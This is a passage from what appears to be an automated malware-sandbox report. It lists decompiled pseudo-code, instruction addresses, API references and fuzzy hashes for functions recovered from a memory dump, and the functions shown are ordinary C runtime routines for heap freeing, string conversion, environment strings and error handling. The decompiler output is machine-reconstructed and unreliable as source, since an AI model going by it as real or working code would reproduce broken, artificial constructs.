																							__eflags = _t416 - 5;
																							if(_t416 < 5) {
																								continue;
																							} else {
																							}
																							L110:
																							__eflags = _t416 - 5;
																							if(__eflags == 0) {
																								_t178 = _t423 + 8; // 0x8b56ff8b
																								_t312 = E0041C7F9(__eflags, _v712, 1, 0x42c598, 0x7f,  &_v536,  *_t178, 1);
																								_t470 = _t470 + 0x1c;
																								__eflags = _t312;
																								_t313 = _v712;
																								if(_t312 == 0) {
																									_t448[1] = _t313;
																								} else {
																									do {
																										 *(_t456 + _t313 * 2 - 0x20c) =  *(_t456 + _t313 * 2 - 0x20c) & 0x000001ff;
																										_t313 = _t313 + 1;
																										__eflags = _t313 - 0x7f;
																									} while (_t313 < 0x7f);
																									_t316 = E0040D704( &_v536,  *0x4381e0, 0xfe);
																									_t470 = _t470 + 0xc;
																									__eflags = _t316;
																									_t448[1] = 0 | _t316 == 0x00000000;
																								}
																								_t193 = _t423 + 8; // 0x8b56ff8b
																								 *_t448 =  *_t193;
																							}
																							 *(_t423 + 0x18) = _t448[1];
																							goto L121;
																						}
																						__eflags = _t416;
																						if(_t416 != 0) {
																							 *_t448 =  *(_t448 + _t416 * 8);
																							_t448[1] =  *(_t448 + 4 + _t416 * 8);
																							 *(_t448 + _t416 * 8) = _v728;
																							 *(_t448 + 4 + _t416 * 8) = _v716;
																						}
																						goto L110;
																					}
																					L121:
																					_t291 = _t355 * 0xc;
																					_t200 = _t291 + 0x42c4d8; // 0x404797
																					 *0x427198(_t423);
																					_t293 =  *((intOrPtr*)( *_t200))();
																					_t387 = _v732;
																					__eflags = _t293;
																					if(_t293 == 0) {
																						__eflags = _t387 - 0x4382e0;
																						if(_t387 == 0x4382e0) {
																							L126:
																							_t294 = _v724;
																						} else {
																							_t447 = _t355 + _t355;
																							__eflags = _t447;
																							asm("lock xadd [eax], ecx");
																							if(_t447 != 0) {
																								goto L126;
																							} else {
																								_t218 = _t447 * 8; // 0x30ff068b
																								E004155C5( *((intOrPtr*)(_t423 + _t218 + 0x28)));
																								_t221 = _t447 * 8; // 0x30ff0c46
																								E004155C5( *((intOrPtr*)(_t423 + _t221 + 0x24)));
																								_t224 = _t355 * 4; // 0x982d
																								E004155C5( *((intOrPtr*)(_t423 + _t224 + 0xa0)));
																								_t294 = _v724;
																								_t390 = _v712;
																								 *(_t294 + _t423) = _t390;
																								 *(_t423 + 0xa0 + _t355 * 4) = _t390;
																							}
																						}
																						_t388 = _v740;
																						 *_t388 = 1;
																						_t282 =  *(_t294 + _t423);
																						 *((intOrPtr*)(_t423 + 0x28 + (_t355 + _t355) * 8)) = _t388;
																					} else {
																						 *((intOrPtr*)(_v724 + _t423)) = _t387;
																						_t205 = _t355 * 4; // 0x982d
																						E004155C5( *((intOrPtr*)(_t423 + _t205 + 0xa0)));
																						 *(_t423 + 0xa0 + _t355 * 4) = _v744;
																						E004155C5(_v740);
																						 *(_t423 + 8) = _v748;
																						goto L84;
																					}
																					goto L85;
																				}
																			}
																		} else {
																			_t282 = _t414;
																			goto L85;
																		}
																		goto L130;
																	}
																	asm("sbb eax, eax");
																	_t277 = _t276 | 0x00000001;
																	__eflags = _t277;
																	goto L93;
																} else {
																	L84:
																	_t282 = 0;
																	__eflags = 0;
																	L85:
																	__eflags = _v16 ^ _t456;
																	E0040AEA8();
																	return _t282;
																}
															} else {
																_t322 = _t438 + _t438;
																__eflags = _t322 - 0x106;
																if(_t322 >= 0x106) {
																	E0040B694();
																	goto L82;
																} else {
																	 *((short*)(_t454 + _t322 - 0x10c)) = 0;
																	_t324 =  &_v276;
																	_push(_t324);
																	_push(_v460);
																	_push(_t419);
																	L83();
																	_t463 = _t466 + 0xc;
																	__eflags = _t324;
																	_t263 = _v452;
																	if(_t324 != 0) {
																		_t263 = _t263 + 1;
																		_v452 = _t263;
																	}
																	L54:
																	_t435 = _t350 + _t438 * 2;
																	_t361 = 0;
																	__eflags =  *_t435;
																	if( *_t435 == 0) {
																		L56:
																		__eflags = _t263;
																		L77:
																		if(__eflags != 0) {
																			goto L79;
																		} else {
																			_t249 = _t361;
																		}
																		goto L80;
																	} else {
																		_t435 = _t435 + 2;
																		__eflags =  *_t435;
																		if( *_t435 != 0) {
																			continue;
																		} else {
																			goto L56;
																		}
																	}
																}
															}
														}
													} else {
														_t325 = 0x3b;
														__eflags =  *_t350 - _t325;
														if( *_t350 != _t325) {
															break;
														} else {
															goto L48;
														}
													}
												}
											}
											goto L130;
										}
										_t249 = 0;
										goto L80;
									}
								}
							}
						}
					} else {
						__eflags = _t435;
						if(_t435 == 0) {
							_t249 =  *(_t419 + (_t249 + 2 + _t249 + 2) * 8);
						} else {
							_push(_t435);
							_push(_t249);
							_push(_t419);
							L83();
						}
						L80:
						__eflags = _v12 ^ _t454;
						E0040AEA8();
						return _t249;
					}
				}
				L130:
			}

0x00417337
0x0041733a
0x0041733c
0x0041733f
0x00417340
0x00417349
0x00417351
0x00417353
0x00417355
0x00417358
0x00417471
0x00417476
0x0041735e
0x0041735e
0x0041735f
0x00417362
0x00417365
0x00417367
0x0041736a
0x0041736a
0x0041736d
0x0041736f
0x00417372
0x00417377
0x00417385
0x0041738f
0x00417392
0x00417395
0x00417395
0x004173a0
0x004173a5
0x004173aa
0x00000000
0x004173b0
0x004173b3
0x004173b3
0x004173b6
0x004173b8
0x004173bb
0x004173bb
0x004173bb
0x004173bd
0x004173bd
0x004173bd
0x004173c3
0x00000000
0x00000000
0x004173c8
0x004173df
0x004173df
0x004173ca
0x004173ca
0x004173d2
0x00000000
0x004173d4
0x004173d4
0x004173d7
0x004173dd
0x00000000
0x00000000
0x00000000
0x00000000
0x004173dd
0x004173d2
0x004173e8
0x004173ed
0x004173ef
0x004173f4
0x004173f7
0x004173fa
0x004173fd
0x00417400
0x00417402
0x00417407
0x00417411
0x00417419
0x00417421
0x00000000
0x00417427
0x0041742b
0x00417478
0x0041747e
0x00417481
0x00417484
0x00417486
0x0041748a
0x0041748e
0x00417490
0x00417493
0x00417498
0x0041748e
0x00417499
0x0041749c
0x0041749e
0x004174a0
0x004174a4
0x004174a5
0x004174a7
0x004174aa
0x004174af
0x004174a5
0x004174b2
0x004174b5
0x004174b8
0x004174bb
0x004174be
0x004174be
0x0041742d
0x0041742d
0x00417430
0x00417433
0x00417435
0x00417439
0x0041743d
0x0041743f
0x00417442
0x00417447
0x0041743d
0x00417448
0x0041744d
0x0041744f
0x00417454
0x00417456
0x00417459
0x0041745e
0x00417454
0x0041745f
0x00417463
0x00417466
0x0041746a
0x0041746d
0x0041746d
0x00000000
0x00417470
0x00000000
0x00417421
0x004173e3
0x004173e5
0x004173e5
0x00000000
0x004173e5
0x004174c5
0x004174c6
0x004174c7
0x004174c8
0x004174c9
0x004174ca
0x004174cf
0x004174d2
0x004174d3
0x004174d5
0x004174db
0x004174e2
0x004174e5
0x004174e8
0x004174e9
0x004174ea
0x004174ed
0x004174ee
0x004174f1
0x004174f7
0x004174f9
0x0041751e
0x00417528
0x0041752e
0x00417530
0x00417536
0x00417538
0x0041778b
0x0041778c
0x00000000
0x0041753e
0x0041753e
0x00417542
0x004176a9
0x004176a9
0x004176c0
0x004176c5
0x004176c8
0x004176ca
0x004176d0
0x004176d0
0x004176d2
0x004176d2
0x004176d5
0x004176d7
0x004176dd
0x004176dd
0x004176df
0x00417766
0x00417766
0x004176e5
0x004176e5
0x004176e7
0x004176ed
0x004176f0
0x004176f3
0x004176f9
0x00000000
0x00000000
0x004176fb
0x004176ff
0x00417728
0x00417728
0x0041772a
0x00417701
0x00417701
0x00417705
0x00417709
0x00417710
0x00417716
0x00000000
0x00417718
0x00417718
0x0041771b
0x0041771e
0x00417726
0x00000000
0x00000000
0x00000000
0x00000000
0x00417726
0x00417716
0x00417735
0x00417735
0x00417737
0x00417765
0x00417765
0x00000000
0x00417739
0x00417739
0x0041773f
0x00417740
0x00417741
0x00417742
0x00417747
0x0041774d
0x00417750
0x00417752
0x00417759
0x0041775b
0x0041775d
0x00417754
0x00417754
0x00417755
0x00000000
0x00417755
0x00417752
0x00000000
0x00417737
0x0041772e
0x00417730
0x00417733
0x00417733
0x00000000
0x00417733
0x0041776c
0x0041776c
0x0041776d
0x00417770
0x00417776
0x00417776
0x0041777f
0x00417781
0x00000000
0x00417783
0x00417783
0x00000000
0x00417783
0x00417781
0x00000000
0x00417548
0x00417548
0x0041754d
0x00000000
0x00417553
0x00417553
0x00417558
0x00000000
0x0041755e
0x0041755e
0x00417564
0x00417569
0x0041756b
0x00417572
0x00417573
0x00417575
0x00000000
0x00000000
0x0041757b
0x0041757b
0x0041757f
0x00417585
0x00000000
0x0041758b
0x0041758d
0x0041758e
0x00417591
0x00000000
0x00417597
0x00417597
0x0041759d
0x004175a2
0x004175ac
0x004175b0
0x004175b5
0x004175b8
0x004175ba
0x00000000
0x004175bc
0x004175bc
0x004175be
0x004175c1
0x004175c1
0x004175c4
0x004175c7
0x004175c7
0x004175d2
0x004175d4
0x004175d6
0x00000000
0x00000000
0x004175d6
0x00000000
0x004175d8
0x004175d8
0x004175de
0x004175e1
0x004175e1
0x004175ef
0x004175f8
0x004175fd
0x00417603
0x00417606
0x00417607
0x00417609
0x00417617
0x00417617
0x0041761e
0x0041767f
0x00000000
0x00417620
0x00417620
0x0041762e
0x00417633
0x00417636
0x00417638
0x004177a8
0x004177aa
0x004177ab
0x004177ac
0x004177ad
0x004177ae
0x004177af
0x004177b4
0x004177b7
0x004177b8
0x004177c0
0x004177c7
0x004177ca
0x004177cb
0x004177ce
0x004177d2
0x004177d3
0x004177d6
0x004177e6
0x004177f2
0x00417809
0x0041780e
0x00417811
0x00417813
0x00417828
0x0041782b
0x0041782b
0x0041782e
0x00417834
0x0041783a
0x0041783d
0x0041783f
0x00417842
0x00417849
0x0041784c
0x00417852
0x00000000
0x00000000
0x00417854
0x00417858
0x00417881
0x00417881
0x0041785a
0x0041785a
0x0041785e
0x00417862
0x00417869
0x0041786f
0x00000000
0x00417871
0x00417871
0x00417874
0x00417877
0x0041787f
0x00000000
0x00000000
0x00000000
0x00000000
0x0041787f
0x0041786f
0x0041788e
0x0041788e
0x00417890
0x00417896
0x0041789c
0x0041789f
0x0041789f
0x004178a2
0x004178a5
0x004178a5
0x004178b5
0x004178c3
0x004178c8
0x004178cf
0x004178d1
0x00000000
0x004178d7
0x004178dd
0x004178e3
0x004178ea
0x004178f0
0x004178f3
0x004178f9
0x00417906
0x0041790d
0x00417912
0x00417915
0x00417917
0x00417b70
0x00417b76
0x00417b77
0x00417b78
0x00417b79
0x00417b7a
0x00417b7b
0x00417b80
0x00417b81
0x00417b86
0x0041791d
0x0041791d
0x0041792b
0x0041792e
0x00417949
0x00417950
0x00417956
0x0041795c
0x00417930
0x00417930
0x00417938
0x00000000
0x0041793a
0x0041793a
0x00417940
0x00417940
0x00417938
0x00417963
0x00417966
0x00417a83
0x00417a86
0x00417a93
0x00417a96
0x00417a9e
0x00417a9e
0x00417a88
0x00417a8e
0x00417a8e
0x0041796c
0x0041796c
0x00417972
0x0041797a
0x0041797c
0x0041797f
0x00417988
0x00417991
0x00417997
0x00417997
0x0041799a
0x0041799c
0x00000000
0x00000000
0x0041799e
0x004179a4
0x004179a5
0x004179b0
0x004179b8
0x004179c0
0x004179c3
0x004179c6
0x004179cc
0x004179d2
0x004179d8
0x004179de
0x004179e1
0x00000000
0x00000000
0x004179e3
0x00417a08
0x00417a08
0x00417a0b
0x00417a0f
0x00417a28
0x00417a2d
0x00417a30
0x00417a32
0x00417a38
0x00417a73
0x00417a3a
0x00417a3a
0x00417a3f
0x00417a47
0x00417a48
0x00417a48
0x00417a5f
0x00417a66
0x00417a69
0x00417a6e
0x00417a6e
0x00417a76
0x00417a79
0x00417a79
0x00417a7e
0x00000000
0x00417a7e
0x004179e5
0x004179e7
0x004179ec
0x004179f2
0x004179fb
0x00417a04
0x00417a04
0x00000000
0x004179e7
0x00417aa1
0x00417aa1
0x00417aa5
0x00417aad
0x00417ab3
0x00417ab6
0x00417abc
0x00417abe
0x00417afe
0x00417b04
0x00417b50
0x00417b50
0x00417b06
0x00417b0b
0x00417b0b
0x00417b11
0x00417b15
0x00000000
0x00417b17
0x00417b17
0x00417b1b
0x00417b20
0x00417b24
0x00417b29
0x00417b30
0x00417b35
0x00417b3e
0x00417b44
0x00417b47
0x00417b47
0x00417b15
0x00417b56
0x00417b5e
0x00417b64
0x00417b67
0x00417ac0
0x00417ac6
0x00417ac9
0x00417ad0
0x00417ae2
0x00417ae9
0x00417af6
0x00000000
0x00417af6
0x00000000
0x00417abe
0x00417917
0x00417892
0x00417892
0x00000000
0x00417892
0x00000000
0x00417890
0x00417889
0x0041788b
0x0041788b
0x00000000
0x00417815
0x00417815
0x00417815
0x00417815
0x00417817
0x0041781c
0x0041781f
0x00417827
0x00417827
0x0041763e
0x0041763e
0x00417641
0x00417646
0x004177a3
0x00000000
0x0041764c
0x0041764e
0x00417656
0x0041765c
0x0041765d
0x00417663
0x00417664
0x00417669
0x0041766c
0x0041766e
0x00417674
0x00417676
0x00417677
0x00417677
0x00417685
0x00417685
0x00417688
0x0041768a
0x0041768d
0x0041769b
0x0041769b
0x00417785
0x00417785
0x00000000
0x00417787
0x00417787
0x00417787
0x00000000
0x0041768f
0x0041768f
0x00417692
0x00417695
0x00000000
0x00000000
0x00000000
0x00000000
0x00417695
0x0041768d
0x00417646
0x00417638
0x0041760b
0x0041760d
0x0041760e
0x00417611
0x00000000
0x00000000
0x00000000
0x00000000
0x00417611
0x00417609
0x00417591
0x00000000
0x00417585
0x004176a2
0x00000000
0x004176a2
0x00417558
0x0041754d
0x00417542
0x004174fb
0x004174fb
0x004174fd
0x00417514
0x004174ff
0x004174ff
0x00417500
0x00417501
0x00417502
0x00417507
0x00417792
0x00417797
0x0041779a
0x004177a2
0x004177a2
0x004174f9
0x00000000

APIs

Part of subcall function 00415216: RtlAllocateHeap.NTDLL(00000000,00000000,?,?,0040B7C7,?,?,?,?,?,0040118F,?,00000001), ref: 00415248

_free.LIBCMT ref: 00417442
_free.LIBCMT ref: 00417459
_free.LIBCMT ref: 00417478
_free.LIBCMT ref: 00417493
_free.LIBCMT ref: 004174AA

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 3b3fabf49e6b7d02720eb9c06e63aaff8a5780509244423c04306f7a7c474e64
Instruction ID: 8142d847e6f02d813c5ddd2695eabc2761d92714910f37a15ed09fba4c68fcaa
Opcode Fuzzy Hash: 3b3fabf49e6b7d02720eb9c06e63aaff8a5780509244423c04306f7a7c474e64
Instruction Fuzzy Hash: 2D51C231A04704AFDB20DF66C881BAA77F5EF58324B14456FE809D7291E739EA81CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00416454, Relevance: 7.6, APIs: 5, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00416454(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x438070; // 0xf2c84916
					_t2 =  &(_t81[1]); // 0x3
					_t56 =  *_t81 ^ _t29;
					_t3 =  &(_t81[2]); // 0x0
					_t78 =  *_t2 ^ _t29;
					_t83 =  *_t3 ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E00416315( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E0040A6C7(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x7
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E0040A6C7(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E0040A6C7(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t7 = _t85 + 4; // 0x4
						_t80 = _t7;
						_push(_t80);
						_v8 = E0041458E(_t56);
						_t40 = E004155C5(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E0041458E(_t56);
						E004155C5(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x438070;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

0x00416454
0x0041645e
0x00416462
0x00416464
0x00416468
0x00416472
0x00416480
0x00416483
0x00416485
0x00416488
0x0041648a
0x0041648c
0x0041648e
0x00416490
0x00416494
0x0041654e
0x0041655c
0x0041655e
0x00416563
0x0041656a
0x0041656c
0x0041657a
0x00416589
0x0041658c
0x0041658e
0x00000000
0x0041658f
0x0041649c
0x004164a1
0x004164a6
0x004164a8
0x004164a8
0x004164aa
0x004164af
0x004164b3
0x004164b3
0x004164b6
0x004164d5
0x004164d5
0x004164d7
0x004164d7
0x004164da
0x004164e3
0x004164e6
0x004164eb
0x004164ee
0x004164f3
0x00000000
0x00000000
0x004164f5
0x00000000
0x004164b8
0x004164b8
0x004164ba
0x004164c3
0x004164c6
0x004164cb
0x004164ce
0x004164d3
0x004164fd
0x00416500
0x00416502
0x00416505
0x0041650d
0x00416513
0x0041651a
0x0041651c
0x00416524
0x00416533
0x00416537
0x00416539
0x0041653c
0x00000000
0x00000000
0x0041653e
0x00416541
0x00416543
0x00416543
0x00416544
0x00416546
0x00416549
0x00000000
0x00416543
0x00000000
0x004164d3
0x004164b6
0x00000000

APIs

_free.LIBCMT ref: 004164C6
_free.LIBCMT ref: 004164E6

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: af6ecf555c6216bf9f73b8c2897890e211dc928436e25e5c22ad328ab451b765
Instruction ID: 17df5b6243cd98e660dee9d04fda1f9c9b6d5ff49156a0676860644a0c96d89b
Opcode Fuzzy Hash: af6ecf555c6216bf9f73b8c2897890e211dc928436e25e5c22ad328ab451b765
Instruction Fuzzy Hash: 5741F732A00314AFCB14DF79C881A9AB7F6EF84314B1645AEE515EB391DB35ED41CB88

Uniqueness

Uniqueness Score: -1.00%

Function 0041C7F9, Relevance: 7.6, APIs: 5, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0041C7F9(void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				signed int _t34;
				signed int _t40;
				int _t45;
				int _t52;
				void* _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				void* _t65;
				int _t67;
				short* _t71;
				signed int _t72;
				short* _t73;

				_t34 =  *0x438070; // 0xf2c84916
				_v8 = _t34 ^ _t72;
				_push(_t53);
				E004105E8(_t53,  &_v28, _t65, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t6 = _v24 + 8; // 0xc0b0a09
					_t52 =  *_t6;
					_t57 = _t52;
					_a24 = _t52;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					E0040AEA8();
					return _t67;
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0xe
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t71 = 0;
					L11:
					if(_t71 != 0) {
						E0040BDD0(_t67, _t71, _t67, _t55);
						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
						if(_t45 != 0) {
							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
						}
					}
					L14:
					E0040A0BC(_t71);
					goto L15;
				}
				_t20 = _t55 + 8; // 0xe
				asm("sbb eax, eax");
				_t47 = _t40 & _t20;
				_t21 = _t55 + 8; // 0xe
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t71 = E00415216(_t63, _t47 & _t63);
					if(_t71 == 0) {
						goto L14;
					}
					 *_t71 = 0xdddd;
					L9:
					_t71 =  &(_t71[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E0040AFF0();
				_t71 = _t73;
				if(_t71 == 0) {
					goto L14;
				}
				 *_t71 = 0xcccc;
				goto L9;
			}

0x0041c801
0x0041c808
0x0041c80b
0x0041c814
0x0041c819
0x0041c81e
0x0041c823
0x0041c823
0x0041c826
0x0041c828
0x0041c828
0x0041c82d
0x0041c846
0x0041c84c
0x0041c851
0x0041c8f0
0x0041c8f4
0x0041c8f9
0x0041c8f9
0x0041c90d
0x0041c915
0x0041c915
0x0041c857
0x0041c85a
0x0041c85f
0x0041c863
0x0041c8af
0x0041c8b1
0x0041c8b3
0x0041c8b8
0x0041c8cf
0x0041c8d7
0x0041c8e7
0x0041c8e7
0x0041c8d7
0x0041c8e9
0x0041c8ea
0x00000000
0x0041c8ef
0x0041c865
0x0041c86a
0x0041c86c
0x0041c86e
0x0041c86e
0x0041c876
0x0041c893
0x0041c89d
0x0041c8a2
0x00000000
0x00000000
0x0041c8a4
0x0041c8aa
0x0041c8aa
0x00000000
0x0041c8aa
0x0041c87a
0x0041c87e
0x0041c883
0x0041c887
0x00000000
0x00000000
0x0041c889
0x00000000

APIs

MultiByteToWideChar.KERNEL32(00000006,00000000,0000007F,0042C598,00000000,00000000,8B56FF8B,00416B06,?,00000006,00000001,0042C598,0000007F,?,8B56FF8B,00000001), ref: 0041C846
__alloca_probe_16.LIBCMT ref: 0041C87E
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0041C8CF
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0041C8E1
__freea.LIBCMT ref: 0041C8EA

Part of subcall function 00415216: RtlAllocateHeap.NTDLL(00000000,00000000,?,?,0040B7C7,?,?,?,?,?,0040118F,?,00000001), ref: 00415248

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: 4a955416c9806da409232c2be3bc975e65b78ff2df8ea9993f8a2a227191a981
Instruction ID: a0b777ae6cb72667b5f6fc36df0153b522fef46a7c13c57cbece50aacdfd79d6
Opcode Fuzzy Hash: 4a955416c9806da409232c2be3bc975e65b78ff2df8ea9993f8a2a227191a981
Instruction Fuzzy Hash: 3131C072A1020AABDB24AF65DC85DEF7BA5EF44310B04012AFC04D6290E739CC95CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0041EE96, Relevance: 7.6, APIs: 5, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041EE96() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E0041EE5F(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E00415216(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E004155C5(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}

0x0041eea5
0x0041eeab
0x0041ef03
0x0041ef03
0x0041eead
0x0041eeae
0x0041eeb3
0x0041eebc
0x0041eec2
0x0041eec8
0x0041eecd
0x00000000
0x0041eecf
0x0041eed5
0x0041eeda
0x0041eef8
0x0041eef2
0x0041eef2
0x0041eef4
0x0041eef4
0x0041eefb
0x0041ef00
0x0041eecd
0x0041ef07
0x0041ef0a
0x0041ef0a
0x0041ef18

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0041EE9F
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041EEC2

Part of subcall function 00415216: RtlAllocateHeap.NTDLL(00000000,00000000,?,?,0040B7C7,?,?,?,?,?,0040118F,?,00000001), ref: 00415248

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041EEE8
_free.LIBCMT ref: 0041EEFB
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041EF0A

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 67d73327055cb4245f2ef8f46546b5008cea6c968e3a993831be155cb4204172
Instruction ID: 1e3e334b3da756d7440a8b1765c3a3cb5e02d7a3f0730811219241b289cc03e8
Opcode Fuzzy Hash: 67d73327055cb4245f2ef8f46546b5008cea6c968e3a993831be155cb4204172
Instruction Fuzzy Hash: 4D018476606725BB233116BB6C8CCFB6A6DDEC6BA4315016AFD04D7201EA698D4381B8

Uniqueness

Uniqueness Score: -1.00%

Function 00418CF5, Relevance: 7.6, APIs: 5, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00418CF5(void* __ecx) {
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t15;
				long _t16;

				_t11 = __ecx;
				_t16 = GetLastError();
				_t10 = 0;
				_t2 =  *0x438218; // 0x6
				_t19 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t15 = E00414C69(_t11, 1, 0x364);
					_pop(_t13);
					if(_t15 != 0) {
						_t4 = E0041A059(_t13, __eflags,  *0x438218, _t15);
						__eflags = _t4;
						if(_t4 != 0) {
							E00418AE3(_t13, _t15, 0x439c7c);
							E004155C5(_t10);
							__eflags = _t15;
							if(_t15 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t15);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E004155C5();
						L8:
						SetLastError(_t16);
					}
				} else {
					_t15 = E0041A003(_t11, _t19, _t2);
					if(_t15 != 0) {
						L9:
						SetLastError(_t16);
						_t10 = _t15;
					} else {
						goto L2;
					}
				}
				return _t10;
			}

0x00418cf5
0x00418d00
0x00418d02
0x00418d04
0x00418d09
0x00418d0c
0x00418d1a
0x00418d26
0x00418d29
0x00418d2c
0x00418d3e
0x00418d43
0x00418d45
0x00418d50
0x00418d56
0x00418d5e
0x00418d60
0x00000000
0x00000000
0x00000000
0x00000000
0x00418d47
0x00418d47
0x00000000
0x00418d47
0x00418d2e
0x00418d2e
0x00418d2f
0x00418d2f
0x00418d62
0x00418d63
0x00418d63
0x00418d0e
0x00418d14
0x00418d18
0x00418d6b
0x00418d6c
0x00418d72
0x00000000
0x00000000
0x00000000
0x00418d18
0x00418d79

APIs

GetLastError.KERNEL32(00000000,00000000,?,00413C32,00415259,?,?,0040B7C7,?,?,?,?,?,0040118F,?,00000001), ref: 00418CFA
_free.LIBCMT ref: 00418D2F
_free.LIBCMT ref: 00418D56
SetLastError.KERNEL32(00000000), ref: 00418D63
SetLastError.KERNEL32(00000000), ref: 00418D6C

Memory Dump Source

Source File: 0000000D.00000002.365397192.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: bf6005485ff8e8cf232f1b6ff62c35e5781d9231111f353863245300e79fc166
Instruction ID: b14945f46bee44be9e8974f43a894ed191a57beeda974930297746f4ab6d568a
Opcode Fuzzy Hash: bf6005485ff8e8cf232f1b6ff62c35e5781d9231111f353863245300e79fc166
